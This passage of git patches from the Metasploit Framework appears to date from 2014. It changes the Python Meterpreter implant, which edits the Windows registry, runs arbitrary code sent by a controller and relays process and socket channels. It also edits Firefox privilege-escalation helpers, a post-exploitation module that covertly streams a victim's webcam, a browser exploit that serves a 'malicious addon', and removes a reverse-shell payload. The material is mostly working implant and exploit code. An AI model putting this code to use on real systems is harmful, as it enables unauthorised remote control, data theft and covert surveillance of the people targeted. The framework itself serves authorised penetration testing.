stdapi_registry_close_key(request, response): def stdapi_registry_create_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] - base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) res_key = ctypes.c_void_p() - if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1290,20 +1255,18 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] - base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) return result, response @meterpreter.register_function_windll @@ -1372,10 +1335,9 @@ def stdapi_registry_load_key(request, response): def stdapi_registry_open_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] - base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) handle_id = ctypes.c_void_p() - if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response @@ -1405,26 +1367,24 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): + REG_SZ = 1 + REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == winreg.REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) - elif value_type.value == winreg.REG_DWORD: + if value_type.value == REG_SZ: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') + elif value_type.value == REG_DWORD: value = value_data[:4] value.reverse() - if sys.version_info[0] < 3: - value = ''.join(map(chr, value)) - else: - value = bytes(value) + value = ''.join(map(chr, value)) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) @@ -1435,10 +1395,9 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar index 6754a37228bb55a53ba3ba32d1d8bea8822755a9..06d20d28ab38d721c974cdae288163d6997fab73 100644 GIT binary patch delta 36 pcmaF8kMZ?B#tEh@UbEf_O|*1o{mS#GmuF)mZx~o)^Q5qw8~`XE4~YN( delta 36 pcmaF8kMZ?B#tEh@F(=bQCR#ePe&Ko4duC%JZx~o)^Q5qw8~`%z5I_I` diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 7ed0222f35..979ebb4107 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,5 +1,12 @@ #!/usr/bin/python import code +try: + import ctypes +except: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') + import os import random import select @@ -8,30 +15,10 @@ import struct import subprocess import sys import threading -import time -import traceback - -try: - import ctypes -except ImportError: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - -if sys.version_info[0] < 3: - is_bytes = lambda obj: issubclass(obj.__class__, str) - bytes = lambda *args: str(*args[:1]) - NULL_BYTE = '\x00' -else: - is_bytes = lambda obj: issubclass(obj.__class__, bytes) - str = lambda x: __builtins__['str'](x, 'UTF-8') - NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # -DEBUGGING = False - PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -113,7 +100,6 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} -EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -121,7 +107,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in range(32)) + return ''.join(random.choice(chars) for x in xrange(32)) @export def inet_pton(family, address): @@ -139,6 +125,25 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') +@export +def packet_get_tlv(pkt, tlv_type): + offset = 0 + while (offset < len(pkt)): + tlv = struct.unpack('>II', pkt[offset:offset+8]) + if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: + val = pkt[offset+8:(offset+8+(tlv[0] - 8))] + if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + val = val.split('\x00', 1)[0] + elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + val = struct.unpack('>I', val)[0] + elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: + val = bool(struct.unpack('b', val)[0]) + elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + pass + return {'type':tlv[1], 'length':tlv[0], 'value':val} + offset += tlv[0] + return {} + @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 @@ -147,7 +152,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = str(val.split(NULL_BYTE, 1)[0]) + val = val.split('\x00', 1)[0] elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -158,14 +163,6 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() -@export -def packet_get_tlv(pkt, tlv_type): - try: - tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] - except IndexError: - return {} - return tlv - @export def tlv_pack(*args): if len(args) == 2: @@ -173,33 +170,20 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' + elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') - else: - value = tlv['value'] - if not is_bytes(value): - value = bytes(value, 'UTF-8') - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(value), tlv['type']) + value + data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] return data -#@export -class MeterpreterFile(object): - def __init__(self, file_obj): - self.file_obj = file_obj - - def __getattr__(self, name): - return getattr(self.file_obj, name) -export(MeterpreterFile) - #@export class MeterpreterSocket(object): def __init__(self, sock): @@ -224,11 +208,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = bytes() + self.data = '' self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), bytes()): + for byte in iter(lambda: self.std.read(1), ''): self.data_lock.acquire() self.data += byte self.data_lock.release() @@ -236,20 +220,15 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def peek(self, l = None): - data = bytes() + def read(self, l = None): + data = '' self.data_lock.acquire() if l == None: data = self.data + self.data = '' else: data = self.data[0:l] - self.data_lock.release() - return data - - def read(self, l = None): - self.data_lock.acquire() - data = self.peek(l) - self.data = self.data[len(data):] + self.data = self.data[l:] self.data_lock.release() return data @@ -257,25 +236,12 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) - self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() - - def write(self, channel_data): - self.stdin.write(channel_data) - self.stdin.flush() - if self.echo_protection: - end_time = time.time() + 0.5 - out_data = bytes() - while (time.time() < end_time) and (out_data != channel_data): - if self.stdout_reader.is_read_ready(): - out_data = self.stdout_reader.peek(len(channel_data)) - if out_data == channel_data: - self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): @@ -285,7 +251,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in list(filter(lambda x: x.startswith('_core'), dir(self))): + for func in filter(lambda x: x.startswith('_core'), dir(self)): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -299,7 +265,6 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): - assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -321,7 +286,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = bytes() + request = '' while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -329,17 +294,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = list(self.channels.keys()) + channel_ids = self.channels.keys() for channel_id in channel_ids: channel = self.channels[channel_id] - data = bytes() + data = '' if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stderr_reader.is_read_ready(): - data = channel.stderr_reader.read() - elif channel.stdout_reader.is_read_ready(): + if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read() + elif channel.stderr_reader.is_read_ready(): + data = channel.stderr_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -347,7 +312,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = bytes() + d = '' if len(d) == 0: self.handle_dead_resource_channel(channel_id) break @@ -392,13 +357,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = list(self.extension_functions.keys()) + preloadlib_methods = self.extension_functions.keys() symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = list(self.extension_functions.keys()) - new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) + postloadlib_methods = self.extension_functions.keys() + new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response @@ -421,10 +386,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, subprocess.Popen): - channel.kill() - elif isinstance(channel, MeterpreterFile): + if isinstance(channel, file): channel.close() + elif isinstance(channel, subprocess.Popen): + channel.kill() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -440,7 +405,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, MeterpreterFile): + if isinstance(channel, file): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response @@ -467,13 +432,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, STDProcess): + if isinstance(channel, file): + data = channel.read(length) + elif isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) - elif isinstance(channel, MeterpreterFile): - data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: @@ -489,13 +454,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, subprocess.Popen): + if isinstance(channel, file): + channel.write(channel_data) + elif isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.write(channel_data) - elif isinstance(channel, MeterpreterFile): - channel.write(channel_data) + channel.stdin.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) @@ -520,17 +485,13 @@ class PythonMeterpreter(object): if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - if DEBUGGING: - print('[*] running method ' + handler_name) + #print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) - except Exception: - if DEBUGGING: - print('[-] method ' + handler_name + ' resulted in an error') - traceback.print_exc(file=sys.stderr) + except Exception, err: + #print("[-] method {0} resulted in an error".format(handler_name)) result = ERROR_FAILURE else: - if DEBUGGING: - print('[-] method ' + handler_name + ' was requested but does not exist') + #print("[-] method {0} was requested but does not exist".format(handler_name)) result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp @@ -538,9 +499,6 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - try: - os.setsid() - except OSError: - pass + os.setsid() met = PythonMeterpreter(s) met.run() From 21be4f21a60698ee2004ed2f8b1a4f5a58905fa0 Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Fri, 6 Jun 2014 09:52:01 -0500 Subject: [PATCH 499/853] Bump version to 4.9.3 --- lib/msf/core/framework.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 302d26a956..120f8693e2 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -18,7 +18,7 @@ class Framework Major = 4 Minor = 9 - Point = 2 + Point = 3 Release = "-dev" if(Point) From 82464bd6aa93e1c76e1960603615ddf33dde7a7b Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Fri, 6 Jun 2014 10:16:44 -0500 Subject: [PATCH 500/853] Update version spec --- spec/lib/msf/core/framework_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb index c6eadf591b..7c96718f7d 100644 --- a/spec/lib/msf/core/framework_spec.rb +++ b/spec/lib/msf/core/framework_spec.rb @@ -6,7 +6,7 @@ require 'msf/core/framework' describe Msf::Framework do describe "#version" do - CURRENT_VERSION = "4.9.2-dev" + CURRENT_VERSION = "4.9.3-dev" subject do described_class.new From 7c762ad42c76d2d954b138c2bfff941cba85649b Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:18:39 -0500 Subject: [PATCH 501/853] Fix some minor bugs in webrtc stuff, inline API code. --- data/webcam/answerer.html | 7 ++++--- data/webcam/offerer.html | 14 +++++++++----- .../exploit/remote/firefox_privilege_escalation.rb | 4 ++-- lib/msf/core/post/webrtc.rb | 10 +++++----- modules/post/firefox/gather/webcam_chat.rb | 7 ++++--- 5 files changed, 24 insertions(+), 18 deletions(-) diff --git a/data/webcam/answerer.html b/data/webcam/answerer.html index dadb7e32f5..13542c299d 100644 --- a/data/webcam/answerer.html +++ b/data/webcam/answerer.html @@ -10,7 +10,7 @@ height: 480px; width: 640px; border-radius: 15px; - -moz-border-raidus: 15px; + -moz-border-radius: 15px; background-color: black; position: absolute; left: 50; @@ -26,7 +26,7 @@ height: 180px; width: 200px; border-radius: 15px; - -moz-border-raidus: 15px; + -moz-border-radius: 15px; background-color: #9B9B9B; position: absolute; top: 480; @@ -66,8 +66,9 @@ left: 10; } </style> -<script src="=WEBRTCAPIJS="> </script> <script> + =WEBRTCAPIJS= + window.onerror = function(e) { document.getElementById("message").innerHTML = "Error: " + e.toString(); } diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index f52a15e352..0cfca566da 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html @@ -84,9 +84,11 @@ } </style> - <script src="api.js"> </script> <script> + =WEBRTCAPIJS= + var channel = '=CHANNEL='; + var myChannel = channel; var websocket = new WebSocket('ws://=SERVER='); websocket.onopen = function() { @@ -136,10 +138,12 @@ }; window.onload = function() { - getUserMedia(function(stream) { - peer.addStream(stream); - peer.startBroadcasting(); - }); + setTimeout(function(){ + getUserMedia(function(stream) { + peer.addStream(stream); + peer.startBroadcasting(); + }); + }, 500); }; function getUserMedia(callback) { diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 0b39034603..607509e900 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -14,11 +14,11 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # privileged javascript context # @return [String] the results that were sent back. This can be achieved through # calling the "send" function, or by just returning the value in +js+ - def js_exec(js) + def js_exec(js, timeout=30) print_status "Running the privileged javascript..." token = "[[#{Rex::Text.rand_text_alpha(8)}]]" session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") - session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + session.shell_read_until_token("[!JAVASCRIPT]", 0, 30) end # Puts the shellcode into memory, adds X flag, and calls it diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index 342bd2e737..83250a3af6 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb @@ -12,13 +12,13 @@ module Msf::Post::WebRTC interface = load_interface('answerer.html') api = load_api_code - tmp_api = Tempfile.new(['api', '.js']) - tmp_api.binmode - tmp_api.write(api) - tmp_api.close + # tmp_api = Tempfile.new(['api', '.js']) + # tmp_api.binmode + # tmp_api.write(api) + # tmp_api.close interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, File.basename(tmp_api.path)) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, api) interface = interface.gsub(/\=RHOST\=/, rhost) interface = interface.gsub(/\=CHANNEL\=/, channel) interface = interface.gsub(/\=OFFERERID\=/, offerer_id) diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index 6871e66997..17b451c664 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -52,6 +52,7 @@ class Metasploit3 < Msf::Post interface = load_interface('offerer.html') api = load_api_code + interface.gsub!(/\=WEBRTCAPIJS\=/, api) interface.gsub!(/\=SERVER\=/, server) interface.gsub!(/\=CHANNEL\=/, channel) interface.gsub!(/\=OFFERERID\=/, offerer_id) @@ -60,8 +61,6 @@ class Metasploit3 < Msf::Post api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); " end - interface.gsub!('<script src="api.js"> </script>', "<script>#{api}</script>") - url = if datastore['CLOSE'] '"about:blank"' else @@ -71,14 +70,16 @@ class Metasploit3 < Msf::Post %Q| (function(send){ try { + var AppShellService = Components .classes["@mozilla.org/appshell/appShellService;1"] .getService(Components.interfaces.nsIAppShellService); var html = "#{Rex::Text.encode_base64(interface)}"; var url = #{url}; - var win = AppShellService.hiddenDOMWindow.open(url, "_self", "width=500,height=500"); + AppShellService.hiddenDOMWindow.openDialog(url, 'xxx'); send("Streaming webcam..."); + } catch (e) { send(e); } From 4a9f50bb60b4c460c197c95666da4fc414ef87b4 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:20:40 -0500 Subject: [PATCH 502/853] Clean up some dead code. --- lib/msf/core/post/webrtc.rb | 17 +++++------------ modules/post/firefox/gather/webcam_chat.rb | 1 - 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index 83250a3af6..0f89b4bd4a 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb @@ -10,18 +10,10 @@ module Msf::Post::WebRTC # def connect_video_chat(server, channel, offerer_id) interface = load_interface('answerer.html') - api = load_api_code - - # tmp_api = Tempfile.new(['api', '.js']) - # tmp_api.binmode - # tmp_api.write(api) - # tmp_api.close - - interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, api) - interface = interface.gsub(/\=RHOST\=/, rhost) - interface = interface.gsub(/\=CHANNEL\=/, channel) - interface = interface.gsub(/\=OFFERERID\=/, offerer_id) + interface.gsub!(/\=SERVER\=/, server) + interface.gsub!(/\=RHOST\=/, rhost) + interface.gsub!(/\=CHANNEL\=/, channel) + interface.gsub!(/\=OFFERERID\=/, offerer_id) tmp_interface = Tempfile.new(['answerer', '.html']) tmp_interface.binmode @@ -45,6 +37,7 @@ module Msf::Post::WebRTC interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) interface_code = '' ::File.open(interface_path) { |f| interface_code = f.read } + interface_code.gsub!(/\=WEBRTCAPIJS\=/, load_api_code) interface_code end diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index 17b451c664..c90ef06a86 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -52,7 +52,6 @@ class Metasploit3 < Msf::Post interface = load_interface('offerer.html') api = load_api_code - interface.gsub!(/\=WEBRTCAPIJS\=/, api) interface.gsub!(/\=SERVER\=/, server) interface.gsub!(/\=CHANNEL\=/, channel) interface.gsub!(/\=OFFERERID\=/, offerer_id) From d990fb499952c26a4039e38ffa52687f5814d245 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:24:45 -0500 Subject: [PATCH 503/853] Remove a number of stray edits and bs. --- data/webcam/offerer.html | 1 - .../remote/firefox_privilege_escalation.rb | 2 +- lib/msf/core/payload/firefox.rb | 1 - .../browser/firefox_proto_crmfrequest.rb | 2 -- .../singles/firefox/shell_reverse_tcp_ssl.rb | 36 ------------------- .../singles/nodejs/shell_reverse_tcp_ssl.rb | 7 ++++ 6 files changed, 8 insertions(+), 41 deletions(-) delete mode 100644 modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index 0cfca566da..c52ddb244b 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html @@ -88,7 +88,6 @@ =WEBRTCAPIJS= var channel = '=CHANNEL='; - var myChannel = channel; var websocket = new WebSocket('ws://=SERVER='); websocket.onopen = function() { diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 607509e900..a927911220 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -18,7 +18,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation print_status "Running the privileged javascript..." token = "[[#{Rex::Text.rand_text_alpha(8)}]]" session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") - session.shell_read_until_token("[!JAVASCRIPT]", 0, 30) + session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout) end # Puts the shellcode into memory, adds X flag, and calls it diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index 8921f0124a..a958c6f5af 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -34,7 +34,6 @@ module Msf::Payload::Firefox return function(request, context, stream, offset, count) { buffer += NetUtil.readInputStreamToString(stream, count); if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) { - if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) { cb(m[2]); buffer = ''; diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index e8f6441a73..2b24b83cc1 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -67,11 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending the malicious addon") send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' }) else - File.write('/tmp/ff.html', generate_html(target_info)) print_status("Sending HTML") send_response_html(cli, generate_html(target_info)) end - end def generate_html(target_info) diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb deleted file mode 100644 index 1a073d9fb5..0000000000 --- a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb +++ /dev/null @@ -1,36 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 